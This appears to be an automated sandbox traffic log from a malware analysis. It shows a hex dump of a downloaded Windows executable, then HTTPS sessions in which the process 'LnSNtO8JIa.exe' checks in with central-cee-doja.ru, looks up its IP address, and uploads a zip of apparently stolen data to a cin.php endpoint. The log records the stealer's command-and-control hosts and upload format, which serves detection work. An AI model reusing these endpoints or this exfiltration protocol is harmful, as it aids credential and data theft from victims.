                                                                                    2024-01-04 07:30:03 UTC695INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 7f 7b be a1 3b 1a d0 f2 3b 1a d0 f2 3b 1a d0 f2 8f 86 21 f2 2f 1a d0 f2 8f 86 23 f2 bb 1a d0 f2 8f 86 22 f2 1e 1a d0 f2 00 44 d3 f3 3c 1a d0 f2 00 44 d5 f3 2e 1a d0 f2 00 44 d4 f3 2b 1a d0 f2 e6 e5 1b f2 33 1a d0 f2 25 48 43 f2 38 1a d0 f2 3b 1a d1 f2 a2 1a d0 f2 ac 44 d8 f3 3a 1a d0 f2 ac 44 d0 f3 3a 1a d0 f2 a9 44 2f f2 3a 1a d0 f2 ac 44 d2 f3 3a 1a d0 f2 52 69 63 68 3b 1a d0
                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.${;;;!/#"D<D.D+3%HC8;D:D:D/:D:Rich;
                                                                                    2024-01-04 07:30:03 UTC1369INData Raw: 00 00 00 00 00 40 00 00 40 2e 67 66 69 64 73 00 00 9c 00 00 00 00 c0 1a 00 00 02 00 00 00 86 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 94 08 00 00 00 d0 1a 00 00 0a 00 00 00 88 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 28 15 00 00 00 e0 1a 00 00 16 00 00 00 92 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                    Data Ascii: @@.gfids@@.rsrc@@.reloc(@B
                                                                                    2024-01-04 07:30:03 UTC1369INData Raw: 89 4c 24 30 4c 8b c7 48 8d 4c 24 60 48 89 4c 24 28 33 c9 48 89 5c 24 20 ff 15 d2 0e 15 00 48 8b 5c 24 68 48 83 c4 40 5f c3 cc cc cc 40 53 56 57 48 83 ec 40 48 8b d9 ff 15 a3 0e 15 00 48 8b b3 f8 00 00 00 33 ff 45 33 c0 48 8d 54 24 60 48 8b ce ff 15 91 0e 15 00 48 85 c0 74 39 48 83 64 24 38 00 48 8d 4c 24 68 48 8b 54 24 60 4c 8b c8 48 89 4c 24 30 4c 8b c6 48 8d 4c 24 70 48 89 4c 24 28 33 c9 48 89 5c 24 20 ff 15 62 0e 15 00 ff c7 83 ff 02 7c b1 48 83 c4 40 5f 5e 5b c3 cc cc cc 48 83 ec 28 85 d2 74 39 83 ea 01 74 28 83 ea 01 74 16 83 fa 01 74 0a b8 01 00 00 00 48 83 c4 28 c3 e8 16 04 00 00 eb 05 e8 e7 03 00 00 0f b6 c0 48 83 c4 28 c3 49 8b d0 48 83 c4 28 e9 0f 00 00 00 4d 85 c0 0f 95 c1 48 83 c4 28 e9 2c 01 00 00 48 89 5c 24 08 48 89 74 24 10 48 89 7c 24 20
                                                                                    Data Ascii: L$0LHL$`HL$(3H\$ H\$hH@_@SVWH@HH3E3HT$`HHt9Hd$8HL$hHT$`LHL$0LHL$pHL$(3H\$ b|H@_^[H(t9t(ttH(H(IH(MH(,H\$Ht$H|$
                                                                                    2024-01-04 07:30:03 UTC1369INData Raw: 83 ec 28 e8 5b 07 00 00 85 c0 74 10 48 8d 0d 2c 6e 19 00 48 83 c4 28 e9 a7 ac 00 00 e8 f2 a1 00 00 85 c0 75 05 e8 cd a1 00 00 48 83 c4 28 c3 48 83 ec 28 33 c9 e8 d1 ae 00 00 48 83 c4 28 e9 34 0f 00 00 40 53 48 83 ec 20 0f b6 05 1f 6e 19 00 85 c9 bb 01 00 00 00 0f 44 c3 88 05 0f 6e 19 00 e8 36 05 00 00 e8 91 0e 00 00 84 c0 75 04 32 c0 eb 14 e8 48 ae 00 00 84 c0 75 09 33 c9 e8 d5 0e 00 00 eb ea 8a c3 48 83 c4 20 5b c3 cc cc cc 48 89 5c 24 08 55 48 8b ec 48 83 ec 40 8b d9 83 f9 01 0f 87 a6 00 00 00 e8 b7 06 00 00 85 c0 74 2b 85 db 75 27 48 8d 0d 84 6d 19 00 e8 3f ac 00 00 85 c0 74 04 32 c0 eb 7a 48 8d 0d 88 6d 19 00 e8 2b ac 00 00 85 c0 0f 94 c0 eb 67 48 8b 15 b5 25 19 00 49 83 c8 ff 8b c2 b9 40 00 00 00 83 e0 3f 2b c8 b0 01 49 d3 c8 4c 33 c2 4c 89 45 e0 4c
                                                                                    Data Ascii: ([tH,nH(uH(H(3H(4@SH nDn6u2Hu3H [H\$UHH@t+u'Hm?t2zHm+gH%I@?+IL3LEL
                                                                                    2024-01-04 07:30:03 UTC1369INData Raw: 32 5e 17 00 48 8d 35 2b 5e 17 00 eb 16 48 8b 3b 48 85 ff 74 0a 48 8b cf e8 1d 00 00 00 ff d7 48 83 c3 08 48 3b de 72 e5 48 8b 5c 24 30 48 8b 74 24 38 48 83 c4 20 5f c3 cc cc 48 ff 25 8d 05 15 00 cc 48 89 5c 24 10 48 89 7c 24 18 55 48 8b ec 48 83 ec 20 83 65 e8 00 33 c9 33 c0 c7 05 f4 20 19 00 02 00 00 00 0f a2 44 8b c1 c7 05 e1 20 19 00 01 00 00 00 81 f1 63 41 4d 44 44 8b ca 44 8b d2 41 81 f1 65 6e 74 69 41 81 f2 69 6e 65 49 41 81 f0 6e 74 65 6c 45 0b d0 44 8b db 44 8b 05 97 68 19 00 41 81 f3 41 75 74 68 45 0b d9 8b d3 44 0b d9 81 f2 47 65 6e 75 33 c9 8b f8 44 0b d2 b8 01 00 00 00 0f a2 89 45 f0 44 8b c9 44 89 4d f8 8b c8 89 5d f4 89 55 fc 45 85 d2 75 52 48 83 0d 79 20 19 00 ff 41 83 c8 04 25 f0 3f ff 0f 44 89 05 45 68 19 00 3d c0 06 01 00 74 28 3d 60 06
                                                                                    Data Ascii: 2^H5+^H;HtHHH;rH\$0Ht$8H _H%H\$H|$UHH e33 D cAMDDDAentiAineIAntelEDDhAAuthEDGenu3DEDDM]UEuRHy A%?DEh=t(=`
                                                                                    2024-01-04 07:30:03 UTC1369INData Raw: 49 b0 0f 10 44 0a c0 0f 10 4c 0a d0 0f 18 84 0a 40 02 00 00 0f 2b 41 c0 0f 2b 49 d0 0f 10 44 0a e0 0f 10 4c 0a f0 75 9d 0f ae f8 e9 38 ff ff ff 0f 1f 44 00 00 49 03 c8 0f 10 44 0a f0 48 83 e9 10 49 83 e8 10 f6 c1 0f 74 17 48 8b c1 48 83 e1 f0 0f 10 c8 0f 10 04 0a 0f 11 08 4c 8b c1 4d 2b c3 4d 8b c8 49 c1 e9 07 74 68 0f 29 01 eb 0d 66 0f 1f 44 00 00 0f 29 41 10 0f 29 09 0f 10 44 0a f0 0f 10 4c 0a e0 48 81 e9 80 00 00 00 0f 29 41 70 0f 29 49 60 0f 10 44 0a 50 0f 10 4c 0a 40 49 ff c9 0f 29 41 50 0f 29 49 40 0f 10 44 0a 30 0f 10 4c 0a 20 0f 29 41 30 0f 29 49 20 0f 10 44 0a 10 0f 10 0c 0a 75 ae 0f 29 41 10 49 83 e0 7f 0f 28 c1 4d 8b c8 49 c1 e9 04 74 1a 66 66 0f 1f 84 00 00 00 00 00 0f 11 01 48 83 e9 10 0f 10 04 0a 49 ff c9 75 f0 49 83 e0 0f 74 08 41 0f 10 0a
                                                                                    Data Ascii: IDL@+A+IDLu8DIDHItHHLM+MIth)fD)A)DLH)Ap)I`DPL@I)AP)I@D0L )A0)I Du)AI(MItffHIuItA
                                                                                    2024-01-04 07:30:03 UTC1369INData Raw: 8b f9 49 8b c8 f3 aa 48 8b fa 49 8b c3 c3 66 66 66 66 66 66 0f 1f 84 00 00 00 00 00 0f 11 01 4c 03 c1 48 83 c1 10 48 83 e1 f0 4c 2b c1 4d 8b c8 49 c1 e9 07 74 36 66 0f 1f 44 00 00 0f 29 01 0f 29 41 10 48 81 c1 80 00 00 00 0f 29 41 a0 0f 29 41 b0 49 ff c9 0f 29 41 c0 0f 29 41 d0 0f 29 41 e0 66 0f 29 41 f0 75 d4 49 83 e0 7f 4d 8b c8 49 c1 e9 04 74 13 0f 1f 80 00 00 00 00 0f 11 01 48 83 c1 10 49 ff c9 75 f4 49 83 e0 0f 74 06 41 0f 11 44 08 f0 49 8b c3 c3 7e 2a 00 00 7b 2a 00 00 a7 2a 00 00 77 2a 00 00 84 2a 00 00 94 2a 00 00 a4 2a 00 00 74 2a 00 00 ac 2a 00 00 88 2a 00 00 c0 2a 00 00 b0 2a 00 00 80 2a 00 00 90 2a 00 00 a0 2a 00 00 70 2a 00 00 c8 2a 00 00 49 8b d1 4c 8d 0d a6 d5 ff ff 43 8b 84 81 0c 2a 00 00 4c 03 c8 49 03 c8 49 8b c3 41 ff e1 66 90 48 89 51
                                                                                    Data Ascii: IHIffffffLHHL+MIt6fD))AH)A)AI)A)A)Af)AuIMItHIuItADI~*{**w****t********p**ILC*LIIAfHQ
                                                                                    2024-01-04 07:30:03 UTC1369INData Raw: 2d 4c 8b 05 2b 11 19 00 eb b1 b9 40 00 00 00 41 8b c0 83 e0 3f 2b c8 48 d3 cf 48 8d 0d 12 d1 ff ff 49 33 f8 4a 87 bc f1 d0 88 19 00 33 c0 48 8b 5c 24 50 48 8b 6c 24 58 48 8b 74 24 60 48 83 c4 20 41 5f 41 5e 41 5d 41 5c 5f c3 48 89 5c 24 08 57 48 83 ec 20 48 8b f9 4c 8d 0d e4 f6 14 00 b9 04 00 00 00 4c 8d 05 d0 f6 14 00 48 8d 15 d1 f6 14 00 e8 0c fe ff ff 48 8b d8 48 85 c0 74 0f 48 8b c8 e8 a8 ef ff ff 48 8b cf ff d3 eb 06 ff 15 07 f4 14 00 48 8b 5c 24 30 48 83 c4 20 5f c3 48 89 5c 24 08 57 48 83 ec 20 8b d9 4c 8d 0d a9 f6 14 00 b9 05 00 00 00 4c 8d 05 95 f6 14 00 48 8d 15 96 f6 14 00 e8 b9 fd ff ff 48 8b f8 48 85 c0 74 0e 48 8b c8 e8 55 ef ff ff 8b cb ff d7 eb 08 8b cb ff 15 cb f3 14 00 48 8b 5c 24 30 48 83 c4 20 5f c3 48 89 5c 24 08 57 48 83 ec 20 8b d9
                                                                                    Data Ascii: -L+@A?+HHI3J3H\$PHl$XHt$`H A_A^A]A\_H\$WH HLLHHHtHHH\$0H _H\$WH LLHHHtHUH\$0H _H\$WH
                                                                                    2024-01-04 07:30:03 UTC1369INData Raw: 0f 58 15 fb fc 14 00 f2 0f 10 1d 5b fc 14 00 66 0f e6 c2 f2 0f 10 0d 5f fc 14 00 f3 0f e6 d0 f2 0f 59 da f2 0f 5c e3 f2 0f 59 ca 66 0f 7e c0 66 0f 28 c4 f2 0f 5c c1 f2 0f 10 1d 4b fc 14 00 66 48 0f 7e c1 f2 0f 10 2d 4e fc 14 00 48 d1 e1 48 c1 e9 35 4c 2b c9 49 83 f9 0f 7e 28 66 0f 28 cc f2 0f 59 da f2 0f 59 ea f2 0f 5c e3 f2 0f 5c cc f2 0f 5c cb f2 0f 5c e9 66 0f 28 c4 66 0f 28 cd f2 0f 5c c5 f2 0f 5c e0 f2 0f 5c e1 66 0f 28 d8 66 0f 28 d0 f2 0f 59 d0 0f ba e0 00 0f 82 98 00 00 00 f2 0f 10 1d 70 39 15 00 f2 0f 59 da f2 0f 10 2d 34 39 15 00 f2 0f 11 64 24 30 66 0f 28 ca f2 0f 59 ca f2 0f 11 44 24 40 f2 0f 59 ea 66 0f 28 e0 f2 0f 58 1d 30 39 15 00 f2 0f 59 ca f2 0f 59 da f2 0f 59 e2 f2 0f 58 2d ec 38 15 00 f2 0f 59 ea f2 0f 58 1d 00 39 15 00 f2 0f 59 15 00
                                                                                    Data Ascii: X[f_Y\Yf~f(\KfH~-NHH5L+I~(f(YY\\\\f(f(\\\f(f(Yp9Y-49d$0f(YD$@Yf(X09YYYX-8YX9Y
                                                                                    2024-01-04 07:30:03 UTC1369INData Raw: 00 00 66 0f 28 d0 f2 0f 59 15 63 f8 14 00 66 0f 28 e0 4d 8b ca 49 c1 e9 34 f2 0f 58 15 58 f8 14 00 f2 0f 10 1d c8 f7 14 00 66 0f e6 c2 f2 0f 10 0d cc f7 14 00 f3 0f e6 d0 f2 0f 59 da f2 0f 5c e3 f2 0f 59 ca 66 0f 7e c0 66 0f 28 c4 f2 0f 5c c1 f2 0f 10 1d b8 f7 14 00 66 48 0f 7e c1 f2 0f 10 2d bb f7 14 00 48 d1 e1 48 c1 e9 35 4c 2b c9 49 83 f9 0f 7e 28 66 0f 28 cc f2 0f 59 da f2 0f 59 ea f2 0f 5c e3 f2 0f 5c cc f2 0f 5c cb f2 0f 5c e9 66 0f 28 c4 66 0f 28 cd f2 0f 5c c5 f2 0f 5c e0 f2 0f 5c e1 66 0f 28 d8 66 0f 28 d0 f2 0f 59 d0 0f ba e0 00 0f 83 95 00 00 00 f2 0f 10 1d fd 33 15 00 f2 0f 59 da f2 0f 10 2d c1 33 15 00 f2 0f 11 64 24 20 66 0f 28 ca f2 0f 59 ca f2 0f 11 44 24 30 f2 0f 59 ea 66 0f 28 e0 f2 0f 58 1d bd 33 15 00 f2 0f 59 ca f2 0f 59 da f2 0f 59
                                                                                    Data Ascii: f(Ycf(MI4XXfY\Yf~f(\fH~-HH5L+I~(f(YY\\\\f(f(\\\f(f(Y3Y-3d$ f(YD$0Yf(X3YYY


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7192.168.2.649720104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:05 UTC84OUTGET //dd.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:05 UTC580INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:05 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mybG9Ax%2F3ytXkvQA5VeTHx9pFIyo2RDH0TxvO7KsChhza4sIxpwgImr%2F%2FF0jGKPX7QJIdJAoNS2rDQprm9cxrZdmRY0W%2BI8KP%2FIy5bxnXOBfLSkdwF8redLY9Rj84ZCmcKW78GAZ"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c62f1e8b05da-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:05 UTC15INData Raw: 61 0d 0a 4e 4f 53 45 54 54 49 4e 47 53 0d 0a
                                                                                    Data Ascii: aNOSETTINGS
                                                                                    2024-01-04 07:30:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    8192.168.2.64972115.204.213.54433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:06 UTC69OUTGET /?output=xml HTTP/1.1
                                                                                    Host: ipwho.is
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:06 UTC207INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:06 GMT
                                                                                    Content-Type: application/xml
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Server: ipwhois
                                                                                    Access-Control-Allow-Headers: *
                                                                                    X-Robots-Tag: noindex
                                                                                    2024-01-04 07:30:06 UTC967INData Raw: 33 62 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 3c 69 70 3e 31 30 32 2e 31 36 35 2e 34 38 2e 35 32 3c 2f 69 70 3e 3c 73 75 63 63 65 73 73 3e 31 3c 2f 73 75 63 63 65 73 73 3e 3c 74 79 70 65 3e 49 50 76 34 3c 2f 74 79 70 65 3e 3c 63 6f 6e 74 69 6e 65 6e 74 3e 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 3c 2f 63 6f 6e 74 69 6e 65 6e 74 3e 3c 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 4e 41 3c 2f 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 3c 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 3c 72 65 67 69 6f 6e 3e 44 69 73
                                                                                    Data Ascii: 3bb<?xml version="1.0" encoding="UTF-8"?><query><ip>102.165.48.52</ip><success>1</success><type>IPv4</type><continent>North America</continent><continent_code>NA</continent_code><country>United States</country><country_code>US</country_code><region>Dis


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    9192.168.2.649722104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:06 UTC343OUTPOST /cin.php?ownerid=1081&buildid=am&countp=0&countc=2&username=user&country=US&ipaddr=102.165.48.52&BSSID=C059624A05&countw=0&rndtoken=clerleq-67127178950&domaindetects=0 HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=---------------------8dc0d8dd4952647
                                                                                    Host: central-cee-doja.ru
                                                                                    Content-Length: 99225
                                                                                    Expect: 100-continue
                                                                                    2024-01-04 07:30:07 UTC25INHTTP/1.1 100 Continue
                                                                                    2024-01-04 07:30:07 UTC149OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 30 64 38 64 64 34 39 35 32 36 34 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 6a 30 68 6e 79 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a
                                                                                    Data Ascii: -----------------------8dc0d8dd4952647Content-Disposition: form-data; name="file"; filename="j0hny.zip"Content-Type: application/octet-stream
                                                                                    2024-01-04 07:30:07 UTC8192OUTData Raw: 50 4b 03 04 14 00 00 00 08 00 24 b4 24 58 81 c8 99 4e 39 02 00 00 02 06 00 00 17 00 00 00 54 68 65 20 43 69 6e 6f 73 68 69 20 50 72 6f 6a 65 63 74 2e 74 78 74 6d 52 bd 92 9b 30 10 ee f5 14 7b d5 35 1e 17 ce 39 9e 49 95 9b 9b 34 69 d2 e4 05 04 08 2c 1b 24 2c 24 fb 48 75 85 8b 2b 52 04 98 f1 03 fa 49 b2 9c 10 2c 24 1e 1b 6b ff be 9f 15 70 bf 5d ef b7 77 f2 bd 02 40 38 77 b0 28 f4 71 ff 68 e7 33 ef 40 86 68 36 1c 1b 58 66 3a 46 50 de 30 fd 36 94 bb 90 6c c3 4c a8 81 0f da a9 61 44 6b c7 b4 57 d2 52 a0 86 b6 4d f0 6c 8c fd cc 75 86 3d 76 42 e0 ff 97 ab 87 a6 e9 86 b2 fa 3d 4e 16 3d 8a 9f a2 44 a3 8c ce 4b b8 52 40 32 41 f6 82 5d 7f ee b7 df ff 35 3f 53 d6 c2 5c df 60 77 04 06 4a c1 16 6b 1b ee a5 99 cb a0 d6 67 4b a6 7b 1e ae 38 90 2e df 16 a2 7a 34 46 dd 76
                                                                                    Data Ascii: PK$$XN9The Cinoshi Project.txtmR0{59I4i,$,$Hu+RI,$kp]w@8w(qh3@h6Xf:FP06lLaDkWRMlu=vB=N=DKR@2A]5?S\`wJkgK{8.z4Fv
                                                                                    2024-01-04 07:30:07 UTC8192OUTData Raw: 89 da a0 4d 06 ed e0 e3 a4 42 26 27 d8 68 3e f1 7e f7 8a 1d 99 8c 6a 9c e7 5c d9 20 b9 f3 8a 2c 67 fd ce 85 47 69 d5 f5 ee e5 eb a6 3f fa 69 fb 84 5e ca 38 e1 3e 94 8e bc 39 66 10 67 f7 ab 4c 0d d2 6a fb ae 58 78 36 4c bc 5b a9 d3 b2 de 11 65 f2 fd 2c 2c cb aa 94 24 b9 d3 3b 65 7f a7 cd ad da 5d 82 fd 80 a6 df b0 ec 66 95 84 1d fb d8 29 93 be fd bc eb a1 44 61 7b a1 73 8d 07 96 83 84 c6 14 c1 fb d3 32 16 30 c0 85 01 78 e7 d3 5d ad d3 83 4f 18 e0 8b 25 06 40 94 09 4f a9 70 7d 16 13 36 9f 98 30 75 21 e6 4c fd 4c d7 2f 25 6f f0 84 8b 31 95 8c e2 a4 ab e7 b3 d8 91 e7 59 50 2c 09 ff a3 46 d1 88 dd 2e 4d 63 c0 9b 82 a8 67 9f c2 6f 1f 55 97 7e 4b 50 77 d1 69 17 be f4 9c cf c5 01 b2 cf 95 9f 8d a5 55 1f b1 57 8b 2e c2 00 fd c8 a4 cb bd ab eb 79 f8 7d ce 17 ad 28
                                                                                    Data Ascii: MB&'h>~j\ ,gGi?i^8>9fgLjXx6L[e,,$;e]f)Da{s20x]O%@Op}60u!LL/%o1YP,F.McgoU~KPwiUW.y}(
                                                                                    2024-01-04 07:30:07 UTC8192OUTData Raw: 91 25 06 99 08 93 9e 86 56 12 30 44 a1 1a 37 01 4f 39 13 8a 24 da 56 45 e9 41 15 ba be 03 de 54 89 6e c6 97 42 19 4f 77 f5 02 fe 69 a9 50 76 44 ec e2 64 12 3e 8d ed 8e 5d 7d b2 67 47 b6 b5 b0 eb cf ae b1 e3 e2 8a 0c 2a c1 2d 34 58 3e 4e b0 aa d4 e8 95 20 b2 cc c3 fa a7 00 77 3c f2 da c3 d5 a8 2a 0c 50 ad 81 01 64 c5 c0 c7 c3 f0 0b 03 b0 63 0a fa 85 8b dc 76 01 06 38 29 02 de 38 b8 bd 0d 4d ea 4b 71 ec b2 35 fe d4 70 ff ba c7 84 4c bf 5f 3a ea a7 89 29 df 35 b6 7a ae 6b cd 74 78 43 41 dc cd 0e ff 68 23 3b f4 0f 27 70 9e fc f7 5d c8 d9 14 81 f7 47 76 5e 1e 82 31 00 8d fc 4d 07 9e e6 71 6c de ce 60 88 3e 5f 93 43 f3 44 57 61 35 a2 ec ad bf 1c 01 8c b3 8b 03 fe 97 8e 12 ee a5 31 fd a7 35 e5 7f 5a 0a e2 1b f1 ff bb f2 90 06 42 a9 b4 dd ad aa 20 b3 f3 48 e8 5c
                                                                                    Data Ascii: %V0D7O9$VEATnBOwiPvDd>]}gG*-4X>N w<*Pdcv8)8MKq5pL_:)5zktxCAh#;'p]Gv^1Mql`>_CDWa515ZB H\
                                                                                    2024-01-04 07:30:07 UTC8192OUTData Raw: b4 12 c3 ee 15 3d 64 0d 0f 57 be 0e 15 86 48 7c 16 33 79 7e d4 e7 02 af 7e ce 63 40 d4 9a ea 8e b8 ec af 18 f0 1f c8 48 b0 e6 2e cc 51 39 f9 10 90 10 b1 98 0e d3 bf 18 bf 02 ac ba aa f8 39 a2 50 23 8f de 97 82 57 12 b9 36 6f 49 8f ac 18 0b 52 4d 52 08 5b e8 cc bd 12 c0 11 20 77 c5 25 ae a2 7c 57 67 55 67 5f e1 68 25 48 ae 56 93 b4 1c 33 e3 94 b4 ef 7e 78 e9 1e 60 65 68 2d 63 15 25 03 2d a7 53 26 d8 8e 90 8f 92 7b 2c fa 9c 68 5d cf c3 92 6b f7 2c 20 a6 23 e2 6b c1 44 66 fe 17 ba ea 9a 1f 01 07 8c 10 60 48 13 45 f7 9d b8 9f 17 36 99 43 ff ce 08 f1 67 c3 6f 60 75 a9 b0 a5 3a bc bf 09 92 7f 8b 72 22 0f b1 af 71 06 fe 96 a3 8a c7 72 26 93 ff 2c 2f 9a 38 f0 df 9c d4 ec 58 38 c0 08 33 21 af c1 39 10 d7 fe a8 26 d9 64 9a 6b 41 6d 39 70 38 31 8b 10 0e b6 06 a1 3d
                                                                                    Data Ascii: =dWH|3y~~c@H.Q99P#W6oIRMR[ w%|WgUg_h%HV3~x`eh-c%-S&{,h]k, #kDf`HE6Cgo`u:r"qr&,/8X83!9&dkAm9p81=
                                                                                    2024-01-04 07:30:07 UTC8192OUTData Raw: f5 d7 43 04 42 96 80 5f 55 ba 62 41 8c 8e f3 65 2f c7 6a 99 5f 2c b6 87 53 f7 b0 be a5 ea 11 da 1e 4e d0 47 2c 5a ac ec dd ce ae ca e3 42 bf 75 74 94 4c f6 78 58 4e d5 95 47 7d fb e3 c0 f8 41 b6 49 d4 c3 10 99 34 85 a4 91 41 db 63 5a 1c cb 8b dc 8e b4 ac 86 60 91 e9 9c fd cf 84 14 d1 9e a2 6d 98 f8 d3 b9 8d 1c 50 44 8e ec ed 45 4d f7 10 54 74 2c 75 57 c8 c6 31 e7 7e 9f 7c b0 a1 a8 8b 97 67 f7 2e 49 9b eb 3e 62 dc 39 69 36 14 3e c0 fa e2 84 77 64 f9 a3 6a 57 cc 05 8a 2b 94 f2 21 99 98 46 9c b5 bd fd e4 e1 47 83 62 1e 51 ed d5 59 d3 33 af 72 33 bd d1 34 49 29 01 e3 ea 34 f0 bb 6c c3 59 42 9b 7b 64 df e4 bf de e7 13 ec d6 74 34 55 6a b5 62 7f f1 fd 49 8c d5 f2 f7 81 9c e6 13 8d 8f fb 47 e7 33 ee 07 16 d1 8e 11 7a 52 85 cd 26 0e ad 3d df bf bb 75 68 d7 8e 38
                                                                                    Data Ascii: CB_UbAe/j_,SNG,ZButLxXNG}AI4AcZ`mPDEMTt,uW1~|g.I>b9i6>wdjW+!FGbQY3r34I)4lYB{dt4UjbIG3zR&=uh8
                                                                                    2024-01-04 07:30:07 UTC8192OUTData Raw: 4c a2 d4 e6 2b 98 cc 37 93 b3 dc e0 a5 10 ae 14 a7 1b e8 2e 2c e4 fe 5e 3c a3 70 cc f0 2c 0e 42 c9 21 cf 50 4c 55 fd f5 ac a0 b6 38 5a d2 81 e1 63 72 53 ef 1e 16 50 14 3f 34 28 f5 55 2a d4 9b 49 92 78 55 e5 f4 6d 3b 47 63 b8 e3 f1 81 a4 50 cd 9f 0f d6 63 d5 75 d5 87 93 b5 45 88 9a 55 b5 33 ef b2 78 67 79 bb be dd ce 38 ad 16 4d 6e cc 06 3d 3d db 36 73 12 6f c4 c4 4c a6 0d 7f 76 c9 84 85 45 46 f3 c1 8d dd a3 f7 77 38 7b f2 0a b7 3a 08 e3 0c ed 75 95 a2 c6 f8 ea 22 96 87 b7 fb 13 fd eb 42 df 4c 70 b5 4f a4 e5 df be c6 e2 d3 dd bd 75 13 bd 10 75 5c b4 a0 8e 60 98 91 95 d7 c8 92 96 58 ac 4f 1e 9e 5f 55 67 4d f0 8d 7a 12 76 3d 87 f3 2a a3 eb 62 8c 6e e1 d5 a5 d8 ea fa e0 e6 1d f9 8a 13 cf f1 77 42 f5 4d 2e af 50 55 28 48 79 d8 68 b5 07 48 91 7d fa 28 a3 e4 77
                                                                                    Data Ascii: L+7.,^<p,B!PLU8ZcrSP?4(U*IxUm;GcPcuEU3xgy8Mn==6soLvEFw8{:u"BLpOuu\`XO_UgMzv=*bnwBM.PU(HyhH}(w
